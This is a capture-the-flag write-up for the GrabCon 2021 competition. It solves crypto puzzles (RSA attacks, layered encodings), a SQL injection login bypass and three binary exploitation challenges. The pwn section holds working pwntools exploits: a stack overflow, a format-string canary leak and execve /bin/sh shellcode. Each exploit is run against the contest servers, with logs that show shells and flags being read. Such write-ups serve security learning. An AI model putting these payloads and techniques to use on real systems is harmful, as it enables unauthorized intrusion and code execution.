# GrabCon 21 - CTF Community # Misc ``` Welcome 50 GrabCON{welcome_to_grabcon_2021} ``` ## Eazy-Peazy ``` E4sy Pe4sy 100 Hack admin user! Link Author: r3curs1v3_pr0xy ``` ' or 1=1;# ' **GrabCON{E4sy_pe4sy_SQL_1nj3ct10n}** # Crypto ## Warm-up ``` Warm-up 50 Mukesh used to drink and then smoke 5 times a day. He is now suffering form cancer his drink was 64 rupees and 32 rupees cigarette that costs to cheap for him. And he has this much of cancer now. Author: Offen5ive ``` ``` https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)From_Base64('A-Za-z0-9%2B/%3D',true)From_Base32('A-Z2-7%3D',true)&input=UzAxWlJFTlhVMU5KVmtoR1VWWktVa3BhUmtaTk1sTkxTVFZLVkVOV1UweExWbFpZUVZsTFZFbGFUa1ZWVmxSTlMwcElSa2MyVTFkS1ZrcEhWMDFMV0V0YVExVlZWRU5YVGxKT1JsTlZTMWRPVWtkR1MwMUVWVXMxUzBkWFZsTkxTMXBEV0ZGVVExUk9VbGxGVDFWVVRFMVNURlpEVFV4RlNrNU1SMWMwUTBsTFdWbEVRMVJEV0V0V01rWk5WakpXVGtKS1JrMVNTMDlNUWt0SFYwNUVXa3RLVjBVMFZsTk9UbEpUUlZkV1ZFdExTa3hXUjAxQ1VrbE9URWRYTlVOUVMwNVhSa1ZTUTFkTFdraEZTVlZhVWs5Q1RVWkZNakpYUzFaS1ZFTlhVMHRMV2xaV1ZWSlRWVWRHVEVaTFZrTkdSMFpJVlRSU1UxWlFSa2RYV1ZSVFRVdE9WbFJMVkV0VFIwWlNWRUZWU2xGTlVrZEdTVlpVVFVzMVNrWk5WRXhhUzFwV1dFbFdNazVPVGt4Rk5GWlVTMHBLVEZaSlVreFJTbFpLUjFkTlMxUkxUVmxFVTFSRFZrNU9Na1ZSVmpKWFNscExSazFXVEZWS1RrcFVRMVZUUlV0YVYwVTBWakpUUjBKT1JrbFZVMWROVWt4R1RWSk1WVXBTU2xkWE5rTllTMGxaVmxWU1ExUkhRVmxWVDFaRFJrMVNUVVUwVmt0UFMwWktWRU5UVTBWTFdsZEdUVlpMVWtkR1UwVTJWa3hNVFZKTlZrdE5TMWROUmt0WFYwOUxSRXRGV1VaVlZVTldUazR5UlZGVldsSlBRa2RHVFZKTFQwczFTMVJCTTBOTlMwcFdXRkZUUTFoTFdsTkZTVlpNVEUxU1JGWkpNakl5U2xKTVIxZFVVMGhMU1ZsV1ZWTXlWMDVPVTBaSFZUTXlTa3BHUmtzeU0wVkxWa2xXVFZWVFZVdFNTMWhKVkRKWFIwSk9SazFXVERKS1NrMUdSVTFETWt0T1RFVkxVbE5YUzA1WFJVMVZRMUpPVGxORlQxWkVNa3BHTlVaUFZreE1SMFpLVkVGWFUwOUxXVmxWTkZKVFZFZEdXVVZKVmxKUlRsSktSVEl5V2xaS05VdEhWMDVMUjB0V1RFWlZWa05YVGswMFZVZFZNMHhNU2taR1N6SXpXVXRLU2xkWFUxTk1TMGxaVjBkTlMxSkhSa3BGV1ZaTVRFcGFUVlpMVmxOUFNsSkxWRUUxUTFOTE5VdFdSVlpEVjB0V1NFWk5WVkpSU1ZWWlJrMHlNa2RMV2twWFZWWlRTa3RhUzBSQlQwdFJTMUZaUkZOVlExSklWVFpSUFQwOVBRPT0K ``` GrabCON{dayuum_s0n!} ## Pokeball RSA ``` Poke Ball RSA 100 Eevee is in trouble. Help him as he tries to evolve into Sylveon in the Real Stormy Arena. Author: RDxR10 ``` ``` n = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319 e = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799 c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818 ``` ``` #https://pycryptodome.readthedocs.io/en/latest/src/public_key/rsa.html N = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319 E = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799 c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818 print((E,N)) from sympy.core import Rational from sympy.ntheory.continued_fraction import continued_fraction_convergents from sympy.ntheory.continued_fraction import continued_fraction_iterator from Crypto.PublicKey import RSA import binascii it = continued_fraction_convergents(continued_fraction_iterator(Rational(E,N))) res=[] for i in range(1000): elt = next(it) if str(elt).find("/")>-1: d=int(str(elt).split("/")[1]) print(".",sep="",end="",flush=True) try: key = RSA.construct((N,E,d)) print("================") print(d) break except: pass pt=hex(pow(c,d,N)) print(pt) print(binascii.unhexlify(pt[2:])) ``` ``` b'e=2,c=9019127052844164572606928250741960583163943438936945828390420331200602392329' ``` ``` import gmpy from Crypto.Util.number import * e=2 ct=9019127052844164572606928250741960583163943438936945828390420331200602392329 ct= gmpy.root(ct,e)[0] import binascii print(binascii.unhexlify(hex(ct)[2:])) ``` ## Not RSA - First Blood ``` Not RSA 440 Whatever it is, it's not RSA. Author: RDxR10 ``` ![](https://i.imgur.com/wUr2g9u.png) ``` from math import sqrt import random from Crypto.Util.number import bytes_to_long,long_to_bytes N = 2433984714450860961589027518159810370561856716063956157321856705975948489337570445957833120668443867975490363019335530343179129689501017626817947777263721 c = 1378297008929492435762470180953416238081302819750327089183697281160938504327642742017058360280755400054663296904328307673692314945545918393502459480987913 a = int(sqrt(N) + 1) b = random.randint(0,9999999999) #flag = b"REDACTED" #m = bytes_to_long(flag) #c = ((a**m)*(b**(a-1)))%((a-1)*(a-1)) p=194545307101606186694882845905355574989 q=253593527157826835431576067999755840801 r=pow(c,pow(p*q,-1,(p-1)*(q-1)),p*q) m=((((c*pow(r,-p*q,N))-1)%N)//(p*q))%N print(hex(m)) print(long_to_bytes(m)) #GrabCON{i75_p4ill13r_f0lks} ``` **GrabCON{i75_p4ill13r_f0lks}** ## Old Monk's Password ``` Old Monk's Password 150 Monk: What's this man? One password, different encoded forms? Author: RDxR10 ``` ``` enc = b'\x0cYUV\x02\x13\x16\x1a\x01\x04\x05C\x00\twcx|z(((%.)=K%(>' enc1 = b'\x0bPPS\r\x0b\x02\x0f\x12\r\x03_G\t\x08yb}v+--*+*8=W,>' enc2 = b'\x07A[\x06\\\r\x15\t\x04\x07\x18VG]U]@\x02\x08&9&%\' 41".;' import codecs import random class pass_w: x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm" def encode(self, text, i = -1): if i < 0 or i > len(self.x) + 1: i = random.randint(0, len(self.x) + 1) out = chr(i) for c in text: out += chr(ord(c) ^ ord(self.x[i])) i = (i + 1)%79 return codecs.encode(out) #y = pass_w() #print(y.encode("REDACTED")) #Enclose password within GrabCON{} def decode(enc): x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm" i = enc[0] print(i) out="" for c in enc[1:]: out += chr(c ^ ord(x[i])) i = (i + 1)%79 print(out) print(decode(enc)) ``` **GrabCON{817letmein40986728ilikeapples}** # Pwn ## Easy bin ``` from pwn import * # Read Service proc = ELF("./easybin") print(proc.symbols) # magie magie = p64(proc.symbols["vuln"]) for i in range(56,57): # lockpick print(i) pl=b"a"*i+magie print(pl) # Execute try: exec=process("./easybin") exec.sendline(pl) #print(exec.read(1024)) exec.interactive() #print(exec.poll()) exec.close() except: pass exploit=True if exploit: conn = remote('35.205.161.145','49153') #pl=b"a"*i+magie #print(conn.recv()) conn.sendline(pl) conn.interactive() conn.close() ``` ``` [*] '/home/kali/Desktop/grabcon/pwn/easybin' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments {'__abi_tag': 4195228, 'deregister_tm_clones': 4198560, 'register_tm_clones': 4198608, '__do_global_dtors_aux': 4198672, 'completed.0': 4210752, '__do_global_dtors_aux_fini_array_entry': 4210184, 'frame_dummy': 4198720, '__frame_dummy_init_array_entry': 4210176, '__FRAME_END__': 4202884, '__init_array_end': 4210184, '_DYNAMIC': 4210192, '__init_array_start': 4210176, '__GNU_EH_FRAME_HDR': 4202552, '_GLOBAL_OFFSET_TABLE_': 4210688, '__libc_csu_fini': 4198928, 'data_start': 4210736, 'vuln': 4198726, '_edata': 4210752, '_fini': 4198936, '__data_start': 4210736, '__dso_handle': 4210744, '_IO_stdin_used': 4202496, '__libc_csu_init': 4198816, '_end': 4210760, '_dl_relocate_static_pie': 4198544, '_start': 4198496, '__bss_start': 4210752, 'main': 4198762, '__TMC_END__': 4210752, '_init': 4198400, 'printf': 4198448, 'plt.printf': 4198448, 'execve': 4198464, 'plt.execve': 4198464, 'gets': 4198480, 'plt.gets': 4198480, '_ITM_deregisterTMCloneTable': 4210656, 'got._ITM_deregisterTMCloneTable': 4210656, '__libc_start_main': 4210664, 'got.__libc_start_main': 4210664, '__gmon_start__': 4210672, 'got.__gmon_start__': 4210672, '_ITM_registerTMCloneTable': 4210680, 'got._ITM_registerTMCloneTable': 4210680, 'got.printf': 4210712, 'got.execve': 4210720, 'got.gets': 4210728} 56 b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaF\x11@\x00\x00\x00\x00\x00' [+] Starting local process './easybin': pid 37201 [*] Switching to interactive mode $ exit [*] Got EOF while reading in interactive $ quit [*] Process './easybin' stopped with exit code 0 (pid 37201) [*] Got EOF while sending in interactive [+] Opening connection to 35.205.161.145 on port 49153: Done [*] Switching to interactive mode $ ls easybin flag.txt run.sh ynetd $ cat flag.txt GrabCON{w3ll_Y0u_Kn0w_Basics!!!} ``` ## Can you ? leak the canary ? ``` from pwn import * import time # Read Service proc = ELF("./cancancan") print(proc.symbols) # magie magie = p32(proc.symbols["win"]) for i in range(25,26): # Iteration print(i) # Execute try: exec=process("./cancancan") exec.sendline(b"%31$x") canary = int(b"0x"+exec.recv(1024).split(b"\n")[1],16) pl = b"aaaa"*i+p32(canary)+magie*4 exec.sendline(pl) exec.interactive() #print(exec.poll()) exec.close() except: pass exploit=True if exploit: conn = remote('35.246.42.94','31337') conn.sendline(b"%31$x") time.sleep(1) canary = int(b"0x"+conn.recv(1024).split(b"\n")[1],16) print(canary) pl = b"aaaa"*i+p32(canary)+magie*4 conn.sendline(pl) conn.interactive() conn.close() pass # GrabCON{Byp4ss_can4ry_1s_fun!} ``` **GrabCON{Byp4ss_can4ry_1s_fun!}** ## Pwn CTF Shellcode on the stack, ``` from pwn import * import time for i in range(302,303): print(i) conn = remote("35.246.42.94","1337")#process("./pwn2") time.sleep(2) stack = int(conn.recv().split(b"\n")[1].split(b" ")[2][:-1],16) print(hex(stack)) #pl =b"\x90"*i+p32(stack)+b"\x90"*100+b"\x31\xc0\x40\x89\xc3\xcd\x80"#b"\x90"*100+b"\x50\x48\x31\xD2\x48\x31\xF6\x48\xBB\x6D\x20\x2B\x2C\x6D\x6D\x31\x2A\x48\xB8\x42\x42\x42\x42\x42\x42\x42\x42\x48\x31\xC3\x53\x54\x5F\x48\x31\xC0\xB0\x3B\x0F\x05" pl =b"\x90"*i+p32(stack)+b"\x90"*100+b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80" conn.sendline(pl) time.sleep(1) try: #print(conn.recv()) conn.interactive() except: conn.close() conn.close() input() #conn.interactive() ``` ``` kali@kali:~/Desktop/grabcon/pwn$ python3 blacklisted.py 302 [+] Opening connection to 35.246.42.94 on port 1337: Done 0xffe7d4be [*] Switching to interactive mode $ $ ls bin dev flag.txt lib lib32 lib64 pwn2 $ cat flag.txt GrabCON{Y0U_g0t_Sh3ll_B4asics} $ ``` **GrabCON{Y0U_g0t_Sh3ll_B4asics}** That's all folks - Electro
Last changed by  
electro bug
344

Read more

Cyber Grabs CTF 0x03 Junior - FlagPoisoning

https://flag-poisoning.fr/ Challenge - Unbr34k4bl3 - 942 points - 7 solves No one can break my rsa encryption, prove me wrong !! Flag Format: cybergrabs{} Author: Mritunjya

2/8/2022
DG'hAck 2021 - Electro

Ranking 22nd on the general with 1400 pts, 13th on the professional category. Achievement First Blood on "Crypto Be Crushed" Cryptography

11/25/2021
YauzaCTF 21 - Crypto Challenges

Shadows The challenge is composed of two files: import json from Crypto.Util.number import bytes_to_long, getPrime from storage import flag def mul(x): m = 1

9/3/2021
Redpwn 2021 - DeepWater

misc/sanity-check 240 solves / 1 point I get to write the sanity check challenge! Alright! flag{1_l0v3_54n17y_ch3ck_ch4ll5} misc/discord

7/12/2021
Read more from electro bug
Published on HackMD